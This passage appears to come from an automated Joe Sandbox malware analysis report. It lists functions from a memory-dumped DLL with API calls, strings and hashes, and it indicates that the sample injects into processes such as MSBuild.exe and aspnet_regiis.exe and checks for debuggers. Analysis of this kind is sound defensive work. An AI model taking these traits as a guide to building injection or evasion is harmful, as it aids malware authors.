kernel32.dll, xrefs: 68BFA8E1, 68BFF5E7
(z(a, xrefs: 68BFD92E
MZx, xrefs: 68BFA909, 68BFA92B, 68BFF60F, 68BFF631
%N[, xrefs: 68BFC525

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: Virtual$Memory$Write$CloseHandleWindow$CreateThread$AllocAllocateConsoleContextProcessShow$Read
String ID: g]J$g]J$%N[$%N[$(z(a$+,^c$;E-F$;E-F$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$D_`$MZx$Yal$[3?H$kernel32.dll$ntdll.dll$6IX$6IX$AEf$AEf$En$En$Y$Y$f?}
API String ID: 1378836336-1102560837
Opcode ID: c93483a747a0a903e1929e0a76f955cc0e3bd9a64461c15aed8fecb1dffeb3f3
Instruction ID: 0174e5c8171e607d1a90de9134a874a39cb25d9ac5297fa71679b0af5e0ec70d
Opcode Fuzzy Hash: c93483a747a0a903e1929e0a76f955cc0e3bd9a64461c15aed8fecb1dffeb3f3
Instruction Fuzzy Hash: E5D3C276A486518FCF04CE3CC9A47EAB7F2AB46315F4041A9D819DB394C636DA8ECF41

Function 68BF1210 Relevance: 54.4, APIs: 21, Strings: 8, Instructions: 3612filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 68BF2290
K32GetModuleInformation.KERNEL32 ref: 68BF26B5
GetModuleFileNameA.KERNEL32 ref: 68BF27CA
CreateFileA.KERNELBASE ref: 68BF280B
CreateFileMappingA.KERNEL32 ref: 68BF2CA7
CloseHandle.KERNEL32 ref: 68BF326A
MapViewOfFile.KERNELBASE ref: 68BF339F
VirtualProtect.KERNELBASE ref: 68BF3BEE
VirtualProtect.KERNELBASE ref: 68BF3CAC
GetCurrentProcess.KERNEL32 ref: 68BF41E9
GetModuleHandleA.KERNEL32 ref: 68BF42A4
CloseHandle.KERNEL32 ref: 68BF4396
GetModuleHandleA.KERNEL32 ref: 68BF4547
CreateFileMappingA.KERNEL32 ref: 68BF45F6
CloseHandle.KERNEL32 ref: 68BF464B
GetCurrentProcess.KERNEL32 ref: 68BF474B
CloseHandle.KERNEL32 ref: 68BF476F

Strings

:MB$, xrefs: 68BF3B0B
@, xrefs: 68BF3BE2
mA=Q, xrefs: 68BF2BEA
mA=Q, xrefs: 68BF2B99
(j, xrefs: 68BF2A3C
'<K, xrefs: 68BF4775
}auZ, xrefs: 68BF358C
'<K, xrefs: 68BF4377

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: Handle$File$CloseModule$CreateCurrentProcess$MappingProtectVirtual$InformationNameView
String ID: (j$:MB$$@$mA=Q$mA=Q$}auZ$'<K$'<K
API String ID: 1267590279-1113462242
Opcode ID: 2e96dcd01c82c4788145141745dd4b65285c87b5274e9178a07bd9cfb7b60a3e
Instruction ID: 3c6dc718d5fb3ccc20c056049d8d54ce315afe4458d2813bee4e6f4176526334
Opcode Fuzzy Hash: 2e96dcd01c82c4788145141745dd4b65285c87b5274e9178a07bd9cfb7b60a3e
Instruction Fuzzy Hash: 34530E76A502808FCF148E3CC9953DEBBE2EB47311F54856AD419DB396C63AC98ECB01

Function 68BF6E40 Relevance: 22.3, APIs: 3, Strings: 9, Instructions: 1271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@B_A, xrefs: 68BF79D8
ntdll.dll, xrefs: 68BF7639, 68BF7F0C
"m&, xrefs: 68BF76EA
NtQueryInformationProcess, xrefs: 68BF764D, 68BF7F20
@B_A, xrefs: 68BF795D
Y(, xrefs: 68BF7F9D
"m&, xrefs: 68BF7613
D6w_, xrefs: 68BF747D
Y(, xrefs: 68BF7B12

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: "m&$"m&$@B_A$@B_A$D6w_$NtQueryInformationProcess$Y($Y($ntdll.dll
API String ID: 0-3531410141
Opcode ID: 6d887758aea5c35e90abd8bb03a1e77b03ff6d5bffd587dcacd1bf7e5e025ea7
Instruction ID: 33a5c6da847d0651b6e443bb8b14410122fafa384fe4798e10dc8fceb18d6833
Opcode Fuzzy Hash: 6d887758aea5c35e90abd8bb03a1e77b03ff6d5bffd587dcacd1bf7e5e025ea7
Instruction Fuzzy Hash: A392DE36A401C58FCF088E7CD6A47EE7BF2EB42315F109526E425DB394D62AD90F8B09

Function 68C00F28 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 68C00F6F
___scrt_uninitialize_crt.LIBCMT ref: 68C00F89

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: a91a79f38cd793a850ef2cf980a87ed69609ede4b83b35e546b9690dc1fd9be0
Instruction ID: 297682e26fb15ae82f40b01ce56b1a9f85245a4bc8fb955ccec4db094f724196
Opcode Fuzzy Hash: a91a79f38cd793a850ef2cf980a87ed69609ede4b83b35e546b9690dc1fd9be0
Instruction Fuzzy Hash: 8441D476D04259EEDB218F9DD800B7EBAB5FB417DCF514126E86467240E7328942DB90

Function 68C00FD8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 68C01015
dllmain_crt_dispatch.LIBCMT ref: 68C0102C
dllmain_raw.LIBCMT ref: 68C01074
dllmain_crt_dispatch.LIBCMT ref: 68C01087
dllmain_raw.LIBCMT ref: 68C0109A

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: fc44eae3a722a51df69647349e9ce75a56f855e2e75e24e7c078a59db6dabca0
Instruction ID: cdbcdb3ccfa8687e7c2841aace448ee4d44612a217c2f621da4d61c66deceb2e
Opcode Fuzzy Hash: fc44eae3a722a51df69647349e9ce75a56f855e2e75e24e7c078a59db6dabca0
Instruction Fuzzy Hash: 4C219176D042A9EADB214F5DD840A7FBAB9FB807DCF514126F8645B210E7328D428BA0

Function 68C00E21 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 68C00E6E

Part of subcall function 68C012EB: InitializeSListHead.KERNEL32(68C60988,68C00E78,68C100D8,00000010,68C00E09,?,?,?,68C01031,?,00000001,?,?,00000001,?,68C10120), ref: 68C012F0

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 68C00ED8

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: cee31229af79a04b2bb6b4e1829c77faee8cf3b1e078e1b720605dbcccd56d36
Instruction ID: 26a5df72c01b70952ac3886ea8a0d5d889be644b978c03a160b952e7123fa5cf
Opcode Fuzzy Hash: cee31229af79a04b2bb6b4e1829c77faee8cf3b1e078e1b720605dbcccd56d36
Instruction Fuzzy Hash: 6421F03A588309DEDB11AFBC84047BEB3A19B023EDFC1002AD5A0772C1FB738086C656

Function 68C05C4D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 68C05C99
GetFileType.KERNELBASE(00000000), ref: 68C05CAB

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 85ff5dafe7e8562c88ce8ec74c055a448c256ba093fc65bac86b5f24ef25eb61
Instruction ID: 99dff4039222ff362bbcb52cbc11eb30a1540616bf0b60ea08fad81bace1ef7e
Opcode Fuzzy Hash: 85ff5dafe7e8562c88ce8ec74c055a448c256ba093fc65bac86b5f24ef25eb61
Instruction Fuzzy Hash: 8711DD71604B9187D7304E3F8C88616BEA4B74F2B0F640B19D4B6E66E1E333D587C642

Function 68C064B0 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 68C064DE
_free.LIBCMT ref: 68C06504

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 366beebe56c32251fb024419a8aa9f8f938763fed09709c68c65beec06799c47
Instruction ID: 191be86eacb94e502930ce05fe09b64074502b6620fe3c0821a4b84421473232
Opcode Fuzzy Hash: 366beebe56c32251fb024419a8aa9f8f938763fed09709c68c65beec06799c47
Instruction Fuzzy Hash: EB118171A04750DBDE20CE2EAC44B6A72A4BF527B9F440626F764EB2C4F375D4C28640

Function 68C04216 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,68C03E19,00000001,00000364,00000013,000000FF,?,00000001,68C04208,68C04299,?,?,68C034AC), ref: 68C04257

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 341884f01d681e0bd869c5ead4b6ec00c9763a5010d13d005ed0cb4fba30706c
Instruction ID: 5534fe9ac71f0563031ec6943a29c727519af363fb3a1ebf2ae18e19747d17e6
Opcode Fuzzy Hash: 341884f01d681e0bd869c5ead4b6ec00c9763a5010d13d005ed0cb4fba30706c
Instruction Fuzzy Hash: 62F0E031B4963467EB318E2E9C04B5B7768EF927E8F954011DC34A7184FB62D50243D0

Non-executed Functions

Function 68C4A4A0 Relevance: 20.3, Strings: 16, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 68C4A4BE
|, xrefs: 68C4A786
c, xrefs: 68C4A589
l, xrefs: 68C4A66C
}, xrefs: 68C4A781
b, xrefs: 68C4A667
n, xrefs: 68C4A5E4
^, xrefs: 68C4A5DF
X, xrefs: 68C4A57F
?, xrefs: 68C4A70A
S, xrefs: 68C4A5DA
A, xrefs: 68C4A520
P, xrefs: 68C4A5E9
_, xrefs: 68C4A584
m, xrefs: 68C4A70F
g, xrefs: 68C4A714

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: ?$A$A$P$S$X$^$_$b$c$g$l$m$n$|$}
API String ID: 0-3745545875
Opcode ID: 8bfdf7074d3ad7e1e1f9cb854a269e5ffabb8806a70228f27a4afefa069409f6
Instruction ID: f2520ae6169038597f89538fddedb25f695197cc2a23bcc2840a972f64ae9250
Opcode Fuzzy Hash: 8bfdf7074d3ad7e1e1f9cb854a269e5ffabb8806a70228f27a4afefa069409f6
Instruction Fuzzy Hash: C7A1E863A0C7D08AE311813DC84834BAEE25BD6218F5D897DE4E497783E1BAC587C363

Function 68C3DC30 Relevance: 15.3, Strings: 12, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8,11, xrefs: 68C3DCE8
y_~), xrefs: 68C3DD95
WDHZ, xrefs: 68C3DCDE
=.dA, xrefs: 68C3DDDB
zaB, xrefs: 68C3DCF2
*&?$, xrefs: 68C3DDA9
:&Dl, xrefs: 68C3DDB3
3HcP, xrefs: 68C3DE8B
7()&, xrefs: 68C3DD9F
<G24, xrefs: 68C3DDD1
O'TT, xrefs: 68C3DD81
KKPV, xrefs: 68C3DCD4

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: *&?$$3HcP$7()&$8,11$:&Dl$<G24$=.dA$KKPV$O'TT$WDHZ$y_~)$zaB
API String ID: 0-2264557016
Opcode ID: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
Instruction ID: 924d68c0078333b33edf11a5af577bbc5856a3d6a0af467fe2d1e950ec2d8e6e
Opcode Fuzzy Hash: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
Instruction Fuzzy Hash: EB91D2B0204B918BD325CF3988907A3BFE1EF96204F59896DD5FB8B382D7356406CB61

Function 68C4AEE0 Relevance: 10.4, Strings: 8, Instructions: 429COMMON

Download Yara Rule

Strings

e], xrefs: 68C4AEFE
HI, xrefs: 68C4B174
2zS, xrefs: 68C4B0B8
\, xrefs: 68C4AF96
dW, xrefs: 68C4AF06
Q:, xrefs: 68C4AF0E
R[, xrefs: 68C4AF16
C, xrefs: 68C4AF8E

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: 2zS$C$HI$Q:$R[$\$dW$e]
API String ID: 0-720759029
Opcode ID: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
Instruction ID: 0319cd739aabe8598cceb929fb5966fc0bb5a0ddf1f79ff9c08fec718cb31ac4
Opcode Fuzzy Hash: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
Instruction Fuzzy Hash: 1DE1FDB5A083009FE3108F65DC85B5FBBA4EF85714F40892CF6A49B290E774C846CB92

Function 68C1B150 Relevance: 6.7, Strings: 5, Instructions: 422COMMON

Download Yara Rule

Strings

ojz., xrefs: 68C1B1CA, 68C1B381
|xtr, xrefs: 68C1B162
jqrs, xrefs: 68C1B2BB
HI, xrefs: 68C1B321
]ik, xrefs: 68C1B28B

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: HI$]ik$jqrs$ojz.$|xtr
API String ID: 0-1770020635
Opcode ID: 835fecbbfd96b503f6d2c9d740594ae70688cbec589e98be2f006d9802251770
Instruction ID: 75be8de98519367eff48410919dea114501b3933ba3ef89b0d89fca5db0a5a1e
Opcode Fuzzy Hash: 835fecbbfd96b503f6d2c9d740594ae70688cbec589e98be2f006d9802251770
Instruction Fuzzy Hash: 24D1057164C3818BD314CF29C4D136FBBE2ABD6354F68892CE4E54B355EA75880ADF82

Function 68C0160A Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 68C01616
IsDebuggerPresent.KERNEL32 ref: 68C016E2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 68C01702
UnhandledExceptionFilter.KERNEL32(?), ref: 68C0170C

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1ed8eba3e153e1a907a150e356613ac628465478c335f1045e10fa635cec1fc2
Instruction ID: ea1f41bd746088cf10b2172b0af5801afe6f438ca2c6fcd96d31dda8a8da761d
Opcode Fuzzy Hash: 1ed8eba3e153e1a907a150e356613ac628465478c335f1045e10fa635cec1fc2
Instruction Fuzzy Hash: 3C311AB5D0521CDBDF10DFA8D9897CDBBB8FF08348F50419AE509A7240EB719A858F44

Function 68C19EE0 Relevance: 5.4, Strings: 4, Instructions: 422COMMON

Download Yara Rule

Strings

XY, xrefs: 68C1A257
nhfn, xrefs: 68C1A180
nhfn, xrefs: 68C1A025, 68C19F90, 68C1A080, 68C19F7C, 68C19FB0
-y{, xrefs: 68C1A217

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: -y{$XY$nhfn$nhfn
API String ID: 0-2084749428
Opcode ID: ed48a5036b80e843f537e818f440342e18c357097157aace08b6ebb63e5a4be7
Instruction ID: 3def4f6659103fe6ee9996b74bb19b8e8f9cc5aef47f07a854a34e267b485306
Opcode Fuzzy Hash: ed48a5036b80e843f537e818f440342e18c357097157aace08b6ebb63e5a4be7
Instruction Fuzzy Hash: 62C1D0B150C3408FD718CF34D89476BBBE5EB82318F644A2DE5E18B292E735C50ACB96

Function 68C03F9A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 68C04092
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 68C0409C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 68C040A9

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 038acab5ded4308dfcf3b978c7cb0c866ed4b056ed21467866f6af0ddc7e26ed
Instruction ID: 0589afd89c513d76a89c71a29a49d834c85dc3d19162ed4452caf547d5736d8b
Opcode Fuzzy Hash: 038acab5ded4308dfcf3b978c7cb0c866ed4b056ed21467866f6af0ddc7e26ed
Instruction Fuzzy Hash: 1331C57490122CEBCB21DF68D9887DDBBB8BF08354F6042DAE41CA7250EB719B858F44

Function 68C02D95 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,68C02D94,?,00000001,?,?), ref: 68C02DB7
TerminateProcess.KERNEL32(00000000,?,68C02D94,?,00000001,?,?), ref: 68C02DBE
ExitProcess.KERNEL32 ref: 68C02DD0

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 75fffb6bc922d4d550bb0f54cdbd4845a534e521c9c77b3b1e6fbf0354d89ab6
Instruction ID: 3ef8659cdebaced05d3a07fcb2141c2da934131e141aef607d8dc6a82b75fe47
Opcode Fuzzy Hash: 75fffb6bc922d4d550bb0f54cdbd4845a534e521c9c77b3b1e6fbf0354d89ab6
Instruction Fuzzy Hash: 5CE08C31000208EFCF12AF68C928E5D3B39FB056C9F614828F82996220DB77DD82CB90

Function 68C2DE40 Relevance: 4.0, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

|, xrefs: 68C2DFF3
/:EX, xrefs: 68C2DEB9
#:EX, xrefs: 68C2DE67

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: #:EX$/:EX$|
API String ID: 0-1498014989
Opcode ID: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
Instruction ID: 4c0f46a8fa1863cfca30d843e8e30ca25886d3ba721ab4b78e5ddc6edc39ca31
Opcode Fuzzy Hash: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
Instruction Fuzzy Hash: FF515571518391CBD304CF25C8616ABBBF1EFD3344F98995CE8D29B690E3788901C796

Function 68C1BD7E Relevance: 2.7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

\^, xrefs: 68C1C026
fW, xrefs: 68C1C01F

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: \^$fW
API String ID: 0-3607370474
Opcode ID: 421771a58df8ca6a154e1360e36a12261740e9a2c7fb950996592df75256efd9
Instruction ID: e00f8996aba883b6308c20629df49967e09a4b7464ea87aed4d1ada0f4abe448
Opcode Fuzzy Hash: 421771a58df8ca6a154e1360e36a12261740e9a2c7fb950996592df75256efd9
Instruction Fuzzy Hash: 58C14EB0A103049FE354DF56D989BA97FB2FB46210F6A81EAD4986F376D7308401CF96

Function 68C017D8 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 68C017EE

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

